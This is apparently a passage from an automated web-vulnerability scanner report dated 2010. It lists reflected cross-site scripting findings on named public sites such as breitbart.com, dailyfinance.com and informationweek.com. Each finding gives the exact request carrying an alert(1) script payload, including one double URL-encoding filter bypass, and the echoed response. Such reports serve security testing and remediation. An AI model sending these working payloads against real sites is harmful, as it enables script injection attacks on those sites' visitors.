<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php5db78<script>alert(1)</script>b688aeeda56</strong> ...[SNIP]...
1.34. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c75b"-alert(1)-"f1a7e06185b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/8c75b"-alert(1)-"f1a7e06185b HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:17:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 91754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/8c75b"-alert(1)-"f1a7e06185b"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73bdf<script>alert(1)</script>fe03bbb12b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article.php73bdf<script>alert(1)</script>fe03bbb12b7 HTTP/1.1
Host: www.breitbart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Mon, 13 Dec 2010 03:18:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Server-Processing-Time: D=624 microseconds
Content-Length: 418
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from ch-sv-bb1.ha-hosting.com
Connection: close
<HTML>
<HEAD>
<title> 404 Error Page</title>
</HEAD>
<BODY>
<p align="center">
<h1>Error 404</h1><br>Page Not Found
<p>
Sun Dec 12 2010 7:18:49 pm PST
<br> 174.121.222.18 tried to load www.breitbart.com/article.php73bdf<script>alert(1)</script>fe03bbb12b7 <br> ...[SNIP]...
1.36. http://www.breitbart.com/article.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.breitbart.com
Path: /article.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d66e</script><script>alert(1)</script>5ce7f257000 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article.php?9d66e</script><script>alert(1)</script>5ce7f257000=1 HTTP/1.1
Host: www.breitbart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Mon, 13 Dec 2010 03:18:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=120
Expires: Mon, 13 Dec 2010 03:20:39 GMT
X-Server-Processing-Time: D=4955 microseconds
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from ch-sv-bb2.ha-hosting.com
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/> <meta http-equiv="Content-type" co ...[SNIP]... <script> var idcomments_acct = 'f31a20c78c62120a6fedd29290aa2238', idcomments_post_id = "", idcomments_post_url = "http://www.breitbart.com/article.php?9d66e</script><script>alert(1)</script>5ce7f257000=1"; </script> ...[SNIP]...
1.37. http://www.breitbart.com/article.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.breitbart.com
Path: /article.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f76af"><script>alert(1)</script>cdebc2c48ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article.php?f76af"><script>alert(1)</script>cdebc2c48ec=1 HTTP/1.1
Host: www.breitbart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Mon, 13 Dec 2010 03:18:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=120
Expires: Mon, 13 Dec 2010 03:20:34 GMT
X-Server-Processing-Time: D=6032 microseconds
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from ch-sv-bb2.ha-hosting.com
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/> <meta http-equiv="Content-type" co ...[SNIP]... <a href="/print.php?f76af"><script>alert(1)</script>cdebc2c48ec=1" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4befb<script>alert(1)</script>4680da74e07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /print.php4befb<script>alert(1)</script>4680da74e07 HTTP/1.1
Host: www.breitbart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Mon, 13 Dec 2010 03:18:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Server-Processing-Time: D=687 microseconds
Content-Length: 416
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from ch-sv-bb2.ha-hosting.com
Connection: close
<HTML>
<HEAD>
<title> 404 Error Page</title>
</HEAD>
<BODY>
<p align="center">
<h1>Error 404</h1><br>Page Not Found
<p>
Sun Dec 12 2010 7:18:38 pm PST
<br> 174.121.222.18 tried to load www.breitbart.com/print.php4befb<script>alert(1)</script>4680da74e07 <br> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e48f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3e7ea77ee4 was submitted in the REST URL parameter 2. This input was echoed as e48f4"><script>alert(1)</script>a3e7ea77ee4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/structured-cablinge48f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3e7ea77ee4/structured-cabling/more-fibre-cable-support-needed-in-africa-19899129/ HTTP/1.1
Host: www.comms-express.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:21:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=kad4rmdk0psje17d7fmldfbaf2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21276
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <a href="/news/structured-cablinge48f4"><script>alert(1)</script>a3e7ea77ee4/firms-advised-to-future-proof-their-network-cabling-systems-800200809/"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acfb0'-alert(1)-'f7bcc9ca40d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/it-businessacfb0'-alert(1)-'f7bcc9ca40d/21443/consumer-mobile-spending-to-outpace-fixed-line-says-analyst/ HTTP/1.1
Host: www.computerworlduk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Dec 2010 03:23:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24711831;expires=Wed, 05-Dec-2040 03:23:06 GMT;path=/
Set-Cookie: CFTOKEN=7215bd5979cc1caa-DDC0C080-24E8-4E1E-79DEA360076FC202;expires=Wed, 05-Dec-2040 03:23:06 GMT;path=/
Set-Cookie: JSESSIONID=3a304b078403edb9a4485d5239a4a3375474;path=/
Content-Type: text/html; charset=UTF-8
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adfb8'-alert(1)-'efc88671618 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/it-business/21443/consumer-mobile-spending-to-outpace-fixed-line-says-analystadfb8'-alert(1)-'efc88671618/ HTTP/1.1
Host: www.computerworlduk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Dec 2010 03:23:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24711873;expires=Wed, 05-Dec-2040 03:23:50 GMT;path=/
Set-Cookie: CFTOKEN=d32b90f012f7454-DDC16CAD-24E8-4E1E-799FB8302C6135FF;expires=Wed, 05-Dec-2040 03:23:50 GMT;path=/
Set-Cookie: JSESSIONID=3a30c2e1d79c7aaa83133f51135a314c4b70;path=/
Content-Type: text/html; charset=UTF-8
1.42. http://www.computerworlduk.com/news/it-business/21443/consumer-mobile-spending-to-outpace-fixed-line-says-analyst/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa1b4'-alert(1)-'db57b14bcba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/it-business/21443/consumer-mobile-spending-to-outpace-fixed-line-says-analyst/?aa1b4'-alert(1)-'db57b14bcba=1 HTTP/1.1
Host: www.computerworlduk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Dec 2010 03:21:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24711765;expires=Wed, 05-Dec-2040 03:21:55 GMT;path=/
Set-Cookie: CFTOKEN=5daa2cae313a405a-DDBFADBC-24E8-4E1E-791EB7BB8B94BEAA;expires=Wed, 05-Dec-2040 03:21:55 GMT;path=/
Set-Cookie: JSESSIONID=3a30d21f5e760a6975cb791e623f6d6a183b;path=/
Content-Type: text/html; charset=UTF-8
1.43. http://www.dailyfinance.com/article/aggressive-pricing-will-drive-multiplay/1211282/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43a77"><script>alert(1)</script>2a83494c9ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article/aggressive-pricing-will-drive-multiplay/1211282/?43a77"><script>alert(1)</script>2a83494c9ed=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/article/aggressive-pricing-will-drive-multiplay/1211282/?43a77"><script>alert(1)</script>2a83494c9ed=1" rel="nofollow"> ...[SNIP]...
1.44. http://www.dailyfinance.com/article/aggressive-pricing-will-drive-multiplay/1211282/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac8d4"-alert(1)-"cd842e8b99e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/aggressive-pricing-will-drive-multiplay/1211282/?ac8d4"-alert(1)-"cd842e8b99e=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = ' ...[SNIP]...
1.45. http://www.dailyfinance.com/article/manda-will-change-telecoms-competitive/1284614/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd3b3"-alert(1)-"7f270e46d91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/manda-will-change-telecoms-competitive/1284614/?cd3b3"-alert(1)-"7f270e46d91=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = ' ...[SNIP]...
1.46. http://www.dailyfinance.com/article/manda-will-change-telecoms-competitive/1284614/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 924e4"><script>alert(1)</script>ef9dbcaa03a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article/manda-will-change-telecoms-competitive/1284614/?924e4"><script>alert(1)</script>ef9dbcaa03a=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fbc2"-alert(1)-"f3fe355a8d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/prepaid-mobile-to-expand-market-for/1178968/?5fbc2"-alert(1)-"f3fe355a8d6=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7231"><script>alert(1)</script>cbb2b2e8e68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article/prepaid-mobile-to-expand-market-for/1178968/?f7231"><script>alert(1)</script>cbb2b2e8e68=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/article/prepaid-mobile-to-expand-market-for/1178968/?f7231"><script>alert(1)</script>cbb2b2e8e68=1" rel="nofollow"> ...[SNIP]...
1.49. http://www.dailyfinance.com/rtn/pr/malaysia-s-broadband-project-to-fuel-telecom-capex-and-revenue-surge-pyramid-finds/rfid365510475/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a95"><script>alert(1)</script>4ed2851d9e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rtn/pr/malaysia-s-broadband-project-to-fuel-telecom-capex-and-revenue-surge-pyramid-finds/rfid365510475/?53a95"><script>alert(1)</script>4ed2851d9e5=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/rtn/pr/malaysia-s-broadband-project-to-fuel-telecom-capex-and-revenue-surge-pyramid-finds/rfid365510475/?53a95"><script>alert(1)</script>4ed2851d9e5=1" rel="nofollow"> ...[SNIP]...
1.50. http://www.dailyfinance.com/rtn/pr/malaysia-s-broadband-project-to-fuel-telecom-capex-and-revenue-surge-pyramid-finds/rfid365510475/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1cc3"-alert(1)-"3705958503d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rtn/pr/malaysia-s-broadband-project-to-fuel-telecom-capex-and-revenue-surge-pyramid-finds/rfid365510475/?f1cc3"-alert(1)-"3705958503d=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into an HTML comment. The payload 6a6a8--><script>alert(1)</script>4a5db981751 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /feed/6a6a8--><script>alert(1)</script>4a5db981751 HTTP/1.1
Host: www.financetech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 13 Dec 2010 03:22:49 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 13 Dec 2010 03:22:49 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=AVFFYUHSXSBIRQE1GHPSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 23355
1.52. http://www.informador.com.mx/economia/2010/194908/6/seis-de-cada-10-pymes-recurren-a-la-publicidad-en-linea.htm [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7338"><script>alert(1)</script>6cb755c1d40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /economia/2010/194908/6/seis-de-cada-10-pymes-recurren-a-la-publicidad-en-linea.htm?b7338"><script>alert(1)</script>6cb755c1d40=1 HTTP/1.1
Host: www.informador.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:22:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=fv00nl7l51jbsbp7sl9vaq7bu2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41373
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="es"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <titl ...[SNIP]... <div class="js-kit-comments" permalink="/economia/2010/194908/6/seis-de-cada-10-pymes-recurren-a-la-publicidad-en-linea.htm?b7338"><script>alert(1)</script>6cb755c1d40=1" uniq="194908" editable="yes"> ...[SNIP]...
1.53. http://www.informador.com.mx/economia/2010/212976/6/registra-mexico-retroceso-en-penetracion-de-telefonia-fija.htm [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cd25"><script>alert(1)</script>ba64116fc8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /economia/2010/212976/6/registra-mexico-retroceso-en-penetracion-de-telefonia-fija.htm?9cd25"><script>alert(1)</script>ba64116fc8e=1 HTTP/1.1
Host: www.informador.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:22:45 GMT
Server: Apache
Set-Cookie: PHPSESSID=jvcpb2epba344gftiltt5206i4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40732
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="es"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <titl ...[SNIP]... <div class="js-kit-comments" permalink="/economia/2010/212976/6/registra-mexico-retroceso-en-penetracion-de-telefonia-fija.htm?9cd25"><script>alert(1)</script>ba64116fc8e=1" uniq="212976" editable="yes"> ...[SNIP]...
1.54. http://www.informador.com.mx/economia/2010/213738/6/preven-liderazgo-de-televisa-en-contenidos-moviles.htm [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e033"><script>alert(1)</script>9c79216f540 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /economia/2010/213738/6/preven-liderazgo-de-televisa-en-contenidos-moviles.htm?4e033"><script>alert(1)</script>9c79216f540=1 HTTP/1.1
Host: www.informador.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:22:44 GMT
Server: Apache
Set-Cookie: PHPSESSID=9r796mb094n51497o6ku7pfsh5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39893
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="es"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <titl ...[SNIP]... <div class="js-kit-comments" permalink="/economia/2010/213738/6/preven-liderazgo-de-televisa-en-contenidos-moviles.htm?4e033"><script>alert(1)</script>9c79216f540=1" uniq="213738" editable="yes"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7e12'-alert(1)-'b52c48e98e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newse7e12'-alert(1)-'b52c48e98e2/infrastructure/ethernet/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 13 Dec 2010 03:23:29 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 13 Dec 2010 03:23:29 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=OK2NAWJREVKMZQE1GHPCKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32156
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/newse7e12'-alert(1)-'b52c48e98e2/infrastructure/ethernet/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=147254684;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1b60"><script>alert(1)</script>31a60ca3d79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsa1b60"><script>alert(1)</script>31a60ca3d79/infrastructure/ethernet/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
